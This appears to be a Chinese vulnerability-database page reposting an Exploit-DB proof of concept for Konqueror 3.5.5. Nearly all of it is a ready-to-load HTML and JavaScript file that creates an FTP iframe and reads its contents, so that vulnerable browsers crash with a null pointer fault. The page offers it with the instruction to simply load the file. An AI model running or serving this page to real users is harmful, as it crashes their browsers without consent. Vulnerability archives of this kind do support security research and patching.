Konqueror 3.5.5 - JavaScript Read of FTP Iframe Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056184 漏洞类型
发布时间 2007-03-05 更新时间 2007-03-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/3415
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<html>
<body>

Demo of how to make Konqueror 3.5.5 crash by mark@bindshell.net.<p>
Simply load this file in Konqueror.  Vulnerable versions should segfault instantly with a null pointer exception.<p>
<p>

<script>
read_iframe = function(iframe_name) {
	var banner = document.getElementById(iframe_name).contentWindow.document.body.innerHTML;
	alert(banner);
}

var iframe = document.createElement("IFRAME");
iframe.setAttribute("src", 'ftp://localhost/anything');
iframe.setAttribute("name", 'myiframe');
iframe.setAttribute("id", 'myiframe');
iframe.setAttribute("onload", 'read_iframe("myiframe")');
iframe.style.width = "100px";
iframe.style.height = "100px";
	
document.body.appendChild(iframe);

</script>
</body>
</html>

# milw0rm.com [2007-03-05]